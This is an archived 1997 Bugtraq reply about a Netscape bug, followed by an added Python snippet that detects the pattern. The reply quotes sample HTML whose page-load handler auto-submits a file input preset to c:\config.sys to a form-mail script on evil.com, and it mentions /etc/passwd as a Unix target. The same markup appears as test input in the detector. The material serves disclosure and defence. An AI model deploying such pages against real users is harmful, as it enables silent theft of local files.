Bugtraq mailing list archives
Re: Netscape Exploit
From: jferg () ACM ORG (Justin C. Ferguson)
Date: Sat, 14 Jun 1997 22:38:03 -0500
On Jun 14, you babbled something about:
> Here is a sample; it isn't complete, but you get the basic idea of what is going on
>
> <HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>
> <BODY onLoad="daForm.submit()">
> <FORM NAME="daForm" ACTION="http://evil.com/cgi-bin/formmail.pl" METHOD=POST>
> <INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your Harddrive">
> <INPUT TYPE=HIDDEN NAME="recipient" value="foobar () evil com">

Unless I'm missing something here, this method _does_not_ work. This was my first idea when I first heard about the bug as well, but from what I can tell, it's not possible to set a value (or a defaultValue using JavaScript) for a file type input. The only even remotely possible way I can see to do this is perhaps through the fact that Netscape caches form data for reposts, and some trick here regarding reloading the page.

If anybody's interested in viewing the page I set up yesterday that does almost exactly what is listed above, it's at http://acm.cs.umr.edu/~jferg/test1.html. (Yes, I will guarantee that I'm not grabbing anybody's files here...)

On a side note, is anyone else but me entertained by the fact that Netscape claims this bug has "few real-world applications", since one must know the exact name and path of the file, yet Unix systems are vulnerable? I'm thinking...ummm.../etc/passwd? *shrugs*

JF
--
Justin Ferguson - jferg () acm org - jferg () usgs gov - http://acm.cs.umr.edu/~jferg
"I will stare at the sun until its light doesn't blind me...I will walk into the fire until its heat doesn't burn me...and I will feed the fire. And into the fire, I'm reunited, into the fire, I am the spark..." - Sarah McLachlan
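
The markup pattern discussed in this message (a file-type input carrying a preset VALUE inside a form that the BODY onLoad handler submits) can be flagged statically when reviewing or filtering pages. The following is an added example, not part of the original post; the names FileFormAudit and audit, the finding labels, and both sample pages (including the collector.example host) are constructed for illustration.

```python
from html.parser import HTMLParser

class FileFormAudit(HTMLParser):
    """Records each <form>, its file-type inputs, and the BODY onLoad handler."""
    def __init__(self):
        super().__init__()
        self.forms, self.onload, self._cur = [], "", None

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names; values keep their case.
        a = {k: (v or "") for k, v in attrs}
        if tag == "body":
            self.onload = a.get("onload", "")
        elif tag == "form":
            self._cur = {"name": a.get("name", ""),
                         "action": a.get("action", ""), "file_inputs": []}
            self.forms.append(self._cur)
        elif tag == "input" and a.get("type", "").lower() == "file" and self._cur:
            self._cur["file_inputs"].append(a.get("value", ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None

def audit(html):
    """Return (finding, form name, detail) tuples for one page."""
    p = FileFormAudit()
    p.feed(html)
    p.close()
    findings = []
    for f in p.forms:
        for preset in f["file_inputs"]:
            if preset:  # page tries to choose the local path itself
                findings.append(("preset-file-path", f["name"], preset))
        # form with a file input that the page submits without user action
        if f["file_inputs"] and f["name"] and f["name"] + ".submit(" in p.onload:
            findings.append(("auto-submit-file-form", f["name"], f["action"]))
    return findings

# Constructed sample modelled on the quoted page; left unclosed on purpose,
# since truncated markup must still be reported.
SUSPECT = r'''<HTML><BODY onLoad="daForm.submit()">
<FORM NAME="daForm" ACTION="http://collector.example/cgi-bin/formmail.pl" METHOD=POST>
<INPUT TYPE=FILE VALUE="c:\config.sys" NAME="doc">'''

# Constructed ordinary upload form: user picks the file and presses submit.
BENIGN = '''<html><body><form name="up" action="/upload" method="post">
<input type="file" name="doc"><input type="submit"></form></body></html>'''

if __name__ == "__main__":
    for page in (SUSPECT, BENIGN):
        print(audit(page))
```
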